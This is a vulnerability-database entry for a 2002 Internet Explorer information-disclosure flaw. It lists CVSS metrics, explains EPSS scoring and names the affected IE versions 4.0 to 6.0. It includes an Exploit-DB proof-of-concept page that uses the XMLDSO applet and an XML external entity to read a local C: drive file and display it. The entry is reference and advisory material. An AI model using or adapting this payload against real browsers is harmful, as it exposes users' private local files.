Metrics
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V2 |
6.4 |
|
AV:N/AC:L/Au:N/C:P/I:P/A:N |
nvd@nist.gov |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 21721
Publication date : 2002-08-16 22h00 +00:00
Author : Jelmer
EDB Verified : Yes
source: https://www.securityfocus.com/bid/5490/info
A problem in Microsoft Internet Explorer could lead to the disclosure of sensitive information.
Due to the design of the datasource applet, it may be possible for a user to view the contents of local files via a remote page. By building a custom-crafted page that specifies the code base as the local system, it would be possible to display the contents of known local files.
<html>
<head>
<base href="file:///C:/">
</head>
<body>
<applet code="com.ms.xml.dso.XMLDSO.class" width="0" height="0" id="xmldso" MAYSCRIPT="true">
<?xml version="1.0"?>
<!DOCTYPE file [
<!ELEMENT file (#PCDATA) >
<!ENTITY contents SYSTEM "file:///C:/jelmer.txt">
]>
<file>
&contents;
</file>
</applet>
<script language="javascript">
setTimeout("showIt()",2000);
function showIt() {
var jelmer = xmldso.getDocument();
alert(jelmer.Text);
}
</script>
</body>
</html>
Products Mentioned
Configuraton 0
Microsoft>>Internet_explorer >> Version 4.0
Microsoft>>Internet_explorer >> Version 4.0.1
Microsoft>>Internet_explorer >> Version 4.0.1
Microsoft>>Internet_explorer >> Version 5.0
Microsoft>>Internet_explorer >> Version 5.0.1
Microsoft>>Internet_explorer >> Version 5.0.1
Microsoft>>Internet_explorer >> Version 5.0.1
Microsoft>>Internet_explorer >> Version 5.5
Microsoft>>Internet_explorer >> Version 5.5
Microsoft>>Internet_explorer >> Version 5.5
Microsoft>>Internet_explorer >> Version 6.0
References